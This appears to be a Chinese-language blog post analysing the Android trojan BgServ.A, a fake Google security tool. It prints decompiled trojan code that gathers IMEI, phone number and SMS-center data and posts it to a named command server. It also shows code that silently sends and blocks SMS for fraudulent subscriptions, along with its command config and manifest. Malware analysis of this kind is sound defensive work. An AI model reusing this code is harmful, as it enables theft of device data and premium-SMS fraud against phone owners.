由于恶意软件泛滥,google针对 Trojan:Android/DroidDream.A 整了一个android Market Security Tool安全工具,没想到这个维稳工具也被人假冒了。这就是Trojan:Android/BgServ.A。
建议有兴趣的读者下载样本深入分析。
看上面两张图,感觉差不多了,无非就是后者申请了更多的权限,要干啥龌龊事情吧。
看看二者的包结构。
肯定就是reapckage了,克隆原来的包,再加点邪恶的细料。料也是现成的,
however, what is shocking is that the threat’s code seems to be based on a project hosted on Google Code and licensed under the Apache License:
http://code.google.com/p/mmsbg/ 来自这儿。
这个软件主要是窃取一些IMEI等信息,然后发到http://www.youlubg.com:81/Coop/request3.php.
收集下列信息并保存到 [INSTALLATION PATH]/.hide/upload.xml这个文件,然后开启发射,
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?> <body> <imei>354059022277352</imei> <version>1.0.1</version> <smscenter>8613800100500</smscenter> <first>1</first> <handled>0</handled> <pid>20013</pid> <installtime>3 Mar 2011 09:13:38 GMT</installtime> <sysversion>7</sysversion> <auth>michael</auth> <fare>0</fare> <phonenum>+886928216512</phonenum> <reason>simLoaded</reason> </body> |
- IMEI
- Phone Number
- SMS Center
- Install Time
- System Version
-
- 收集完了就发射,
new-instance v8, Ljava/net/URI; const-string v9, "http://www.youlubg.com:81/Coop/request3.php" invoke-direct {v8, v9}, Ljava/net/URI;-><init>(Ljava/lang/String;)V invoke-virtual {v6, v8}, Lorg/apache/http/client/methods/HttpPost;->setURI(Ljava/net/URI;)V ... invoke-interface {v5, v6}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse; |
还得接收主人的远程指令:
Next, it receives commands from the reply to the POST and saves the commands in the following file:
[INSTALLATION PATH]/.hide/serverInfo.xml
<?xml version="1.0" encoding="UTF-8" ?> <body> <auto_run>1</auto_run> <auto_link_time>24</auto_link_time> <version>1.0.1</version> <channel> <channel_name>vedio</channel_name> <vedio_url>http://211.136.165.53/wl/rmw1s/pp66.jsp</vedio_url> <channel_sms>2</channel_sms> <intercept_key> <key>移动</key> <key>费用</key> <key>1元</key> <key>2元</key> </intercept_key> <intercept_time>2000</intercept_time> <limit_nums_day>4</limit_nums_day> <limit_nums_month>4</limit_nums_month> </channel> </body> |
可以悄悄的发短信:
This allows the remote attacker to send SMS messages from the compromised device.
拦截短信:
The threat also has the capability to block incoming SMS messages.
上述功能就是典型的恶意订购啊!
切换APN是WAP时代的事情了,现在价值不大了。
The threat may change the access port name (APN) to the following WAP network:
Name: cmwap
APN: cmwap
Proxy: 10.0.0.172
Port: 80
MCC: 460
MNC: 02
Type: default
MMSC: http://mmsc.monternet.com
Number: [EXISTING SIM OPERATOR NUMBER]
还会下载一些咚咚!
It then downloads a list of links from a remote site listed in the serverInfo.xml file and saves it as the following file:
[INSTALLATION PATH]/.hide/vedio.xml
It also downloads a file from a URL listed in the vedio.xml file and saves it as the following file:
[INSTALLATION PATH]/.hide/vedio_file.3gp
It then restores the APN to its original settings.
The Trojan logs its activities in the following file for debugging purposes:
[INSTALLATION PATH]/.hide/log.txt
围观系统注册了那些接收装置:
<receiver android:name="com.mms.bg.transaction.SmsReceiver">
<intent-filter>
<action android:name="com.android.mms.transaction.MESSAGE_SENT" />
<data android:scheme="content" />
</intent-filter>
<intent-filter>
<action android:name="android.intent.action.SEND_MESSAGE" />
</intent-filter>
</receiver>
<receiver android:name="com.mms.bg.transaction.PrivilegedSmsReceiver" android:permission="android.permission.BROADCAST_SMS">
<intent-filter android:priority="1000">
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<receiver android:name="com.mms.bg.ui.BootReceiver">
<intent-filter>
<action android:name="android.intent.action.BOOT_COMPLETED" />
</intent-filter>
</receiver>
<receiver android:name="com.mms.bg.ui.AutoSMSRecevier">
<intent-filter>
<action android:name="com.mms.bg.SMS" />
</intent-filter>
</receiver>
<receiver android:name="com.mms.bg.ui.InternetStatusReceiver">
<intent-filter>
<action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
</intent-filter>
</receiver>
围观系统申请了那些权限,这要怎么闹!滚粗!
<activity android:theme="@android:style/Theme.NoTitleBar.Fullscreen" android:label="@string/app_name" android:name="com.mms.bg.ui.FakeLanucherActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</activity>
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.WAKE_LOCK" />
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
<uses-permission android:name="android.permission.INTERNET" />
很多代码都是来源于:http://mmsbg.googlecode.com/svn-history/r43/trunk/src/com/mms/bg/ui/SettingManager.java
private SettingManager(Context context)
{
mContext = context;
BASE_PATH = (newStringBuilder()).append(context.getFilesDir().getAbsolutePath()).append("/.hide/").toString();
File file = new File(BASE_PATH);
if (!file.exists())
file.mkdirs();
mSP =context.getSharedPreferences(SETTING_FILE_NAME, 0);
mEditor = mSP.edit();
mLog = LogUtil.getInstance((new StringBuilder()).append(BASE_PATH).append("log.txt").toString());
UPLOAD_FILE_PATH = (newStringBuilder()).append(BASE_PATH).append("upload.xml").toString();
DOWNLOAD_FILE_PATH = (newStringBuilder()).append(BASE_PATH).append("serverInfo.xml").toString();
VEDIO_DOWNLOAD_FILE_PATH = (newStringBuilder()).append(BASE_PATH).append("vedio.xml").toString();
VEDIO_FILE_DOWNLOAD_FILE_PATH =(newStringBuilder()).append(BASE_PATH).append("vedio_file.3gp").toString();
mConnMgr =(ConnectivityManager)mContext.getSystemService("connectivity");
mResolver =mContext.getContentResolver();
}
收集的信息包括:IMEI、Phone Number、SMS Center、Install Time 、System Version
private void savePhoneInfo(String s)
{
String s1 = getSMSCenter();
LOGD((new StringBuilder()).append("[[savePhoneInfo]]smsCenter = ").append(s1).toString());
if (s1 != null)
{
LOGD((newStringBuilder()).append("[[savePhoneInfo]] split the smsCenter =").append(s1).toString());
TelephonyManagertelephonymanager = (TelephonyManager)mContext.getSystemService("phone");
String s2 =telephonymanager.getDeviceId();
String s3 =telephonymanager.getLine1Number();
if (s3 == null)
s3 ="0";
String s4 =String.valueOf(getSMSRoundTotalSend());
String s5 = mPid;
if (s == null)
s = "nothing";
String s6 = getFirstStartTime();
if (s6 == null)
{
setFirstStartTime();
s6 =getFirstStartTime();
}
String s7 =android.os.Build.VERSION.SDK;
try
{
File file = newFile(UPLOAD_FILE_PATH);
FileOutputStreamfileoutputstream;
XmlSerializerxmlserializer;
XmlSerializerxmlserializer1;
if(file.exists())
file.delete();
else
file.createNewFile();
fileoutputstream =new FileOutputStream(file);
xmlserializer =Xml.newSerializer();
xmlserializer.setOutput(fileoutputstream,"UTF-8");
xmlserializer.startDocument("UTF-8",Boolean.valueOf(true));
xmlserializer1 =xmlserializer.startTag("", "body");
xmlserializer1.startTag("","imei");
xmlserializer1.text(s2);
xmlserializer1.endTag("","imei");
xmlserializer1.startTag("","version");
xmlserializer1.text("1.0.1");
xmlserializer1.endTag("","version");
xmlserializer1.startTag("","smscenter");
xmlserializer1.text(s1);
xmlserializer1.endTag("","smscenter");
xmlserializer1.startTag("","first");
xmlserializer1.text("1");
xmlserializer1.endTag("","first");
xmlserializer1.startTag("","handled");
xmlserializer1.text(s4);
xmlserializer1.endTag("","handled");
xmlserializer1.startTag("","pid");
xmlserializer1.text(s5);
xmlserializer1.endTag("","pid");
xmlserializer1.startTag("","installtime");
xmlserializer1.text(s6);
xmlserializer1.endTag("","installtime");
xmlserializer1.startTag("","sysversion");
xmlserializer1.text(s7);
xmlserializer1.endTag("","sysversion");
xmlserializer1.startTag("","auth");
xmlserializer1.text("michael");
xmlserializer1.endTag("","auth");
xmlserializer1.startTag("","fare");
xmlserializer1.text("0");
xmlserializer1.endTag("","fare");
xmlserializer1.startTag("","phonenum");
xmlserializer1.text(s3);
xmlserializer1.endTag("","phonenum");
xmlserializer1.startTag("","reason");
xmlserializer1.text(s);
xmlserializer1.endTag("","reason");
xmlserializer.endTag("","body");
xmlserializer.flush();
xmlserializer.endDocument();
fileoutputstream.close();
}
catch (Exceptionexception) { }
} else
{
WorkingMessage workingmessage = WorkingMessage.createEmpty(mContext);
workingmessage.setDestNum("10086");
workingmessage.setText("1234567");
setSMSTempBlockNumAndTimes("10086","1");
workingmessage.send();
}
}
上传手机的信息到网址:http://www.youlubg.com:81/Coop/request3.php
public HttpResponseopenConnection(File file)
{
DefaultHttpClientdefaulthttpclient;
HttpPost httppost;
LOGD("[[openConnection]]");
defaulthttpclient = newDefaultHttpClient(getParams());
httppost = new HttpPost();
httppost.setURI(newURI("http://www.youlubg.com:81/Coop/request3.php"));
…
}
拦截短信:
public classPhoneCallReceiver extends BroadcastReceiver
{
private static final boolean DEBUG = false;
private static final String TAG ="PhoneCallReceiver";
public static final void LOGD(StringparamString)
{
}
public void onReceive(Context paramContext,Intent paramIntent)
{
LOGD("[[onReceive]] receive a new callfor intent : " + paramIntent);
LOGD("++++++++++ result = " +getResultData());
String str = getResultData();
if (str != null)
{
SettingManager localSettingManager =SettingManager.getInstance(paramContext);
long l1 =localSettingManager.getSMSBlockBeginTime();
long l2 =localSettingManager.getSMSBlockDelayTime();
if ((System.currentTimeMillis() - l1 <l2) && ((str.equals("10086")) ||(str.equals("10010"))))
setResultData(null);
}
}
}